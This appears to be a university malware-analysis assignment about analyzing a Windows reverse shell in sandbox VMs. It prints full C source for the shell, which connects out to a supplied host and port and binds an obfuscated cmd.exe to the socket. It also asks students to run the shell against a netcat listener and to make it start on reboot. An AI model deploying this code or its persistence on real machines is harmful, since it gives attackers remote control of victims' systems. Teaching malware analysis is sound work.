lunix assignment 1

/in /by

SimpleReverseShell.7z

CAP 4145 Introduction to Malware Analysis

Assignment 6 – Analyze Malicious Windows Programs

19 points

Instructions:

  • Note: Blue text points to a web link. Ctrl + Click to follow link.
  • This is a team assignment. However, every student MUST submit the term project report even if all members of a group submit the same report.
  • Answers to all questions must be put into ONE document. That is, every time, each student can only submit one report document, answering all questions of this assignment, if not explicitly stated otherwise.
  • Students must put answers following each question in this assignment. The instructor will not grade a report with only answers in it and the student gets zero for such an assignment. An assignment report must include original questions.
  • Students MUST submit the finished assignment in either Microsoft Word or pdf format to Webcourse. The doc must be submitted as ONE standalone file and cannot be tarred or zipped into a container.
  • All required files or docs must be submitted in one submission (last submission). Note: Blackboard allows unlimited number of submission of one assignment by students.
  • Refer to Print screen on how to take a screenshot. Pressing the Alt key in combination with PrtSc will capture the currently selected window.

Problems:

Answer each question following the original question. Do NOT delete the original question.

The students are provided SimpleReverseShell.7z, which contains source code of a reverse shell.

Requirements:

  • The code shell.c in SimpleReverseShell.7z is given below. The students can refer to readme.txt in SimpleReverseShell.7z and search Google for specific APIs. Answer the questions following the code below.
  • Please read compile.sh and revise it for the programming environment chosen by the students. Hint: The programming environment is similar to the one in Assignment 5.
    • Paste the revised compile.sh following this question. (2 points)
    • Run compile.sh and provide a screenshot that shows the compiled program.(1 point)
  • Please read readme.txt and understand how to run the program. That is, the students should first start a nc (netcat) command as a server that accepts incoming connections at the sandbox VM LINUX01. On the sandbox VM WINHOST01, the students start the malware.
    • Please write down the commands the students run on LINUX01 and WINHOST01 following this questions. (2 points)
    • Please provide a screenshot that shows the result of running the malware. (1 point)
  • Please select an approach so that the malware can start when WINHOST01 reboots.
    • Please explain the chosen approach. (2 points)
    • Please post related commands or screenshots following this question to show the chosen approach works. (2 points)

// shell.c

#include <winsock2.h>

#include <stdio.h>

#pragma comment(lib, “w2_32”)

WSADATA wsaData;

SOCKET Winsock;

SOCKET Sock;

struct sockaddr_in hax;

char aip_addr[16];

STARTUPINFO ini_processo;

PROCESS_INFORMATION processo_info;

int main(int argc, char *argv[])

{

WSAStartup(MAKEWORD(2,2), &wsaData);

Winsock=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,(unsigned int)NULL,(unsigned int)NULL);

if (argv[1] == NULL){

exit(1);

}

struct hostent *host;

host = gethostbyname(argv[1]);

strcpy(aip_addr, inet_ntoa(*((struct in_addr *)host->h_addr)));

hax.sin_family = AF_INET;

hax.sin_port = htons(atoi(argv[2]));

hax.sin_addr.s_addr =inet_addr(aip_addr);

WSAConnect(Winsock,(SOCKADDR*)&hax, sizeof(hax),NULL,NULL,NULL,NULL);

if (WSAGetLastError() == 0) {

memset(&ini_processo, 0, sizeof(ini_processo));

ini_processo.cb=sizeof(ini_processo);

ini_processo.dwFlags=STARTF_USESTDHANDLES;

ini_processo.hStdInput = ini_processo.hStdOutput = ini_processo.hStdError = (HANDLE)Winsock;

char *myArray[4] = { “cm”, “d.e”, “x”, “e” };

char command[8] = “”;

snprintf( command, sizeof(command), “%s%s%s%s”, myArray[0], myArray[1], myArray[2], myArray[3]);

CreateProcess(NULL, command, NULL, NULL, TRUE, 0, NULL, NULL, &ini_processo, &processo_info);

exit(0);

} else {

exit(0);

}

}

  • Please give a comment to each instruction above, and explain what each instruction does. (8 points)
  • Please explain what this program does. (1 point)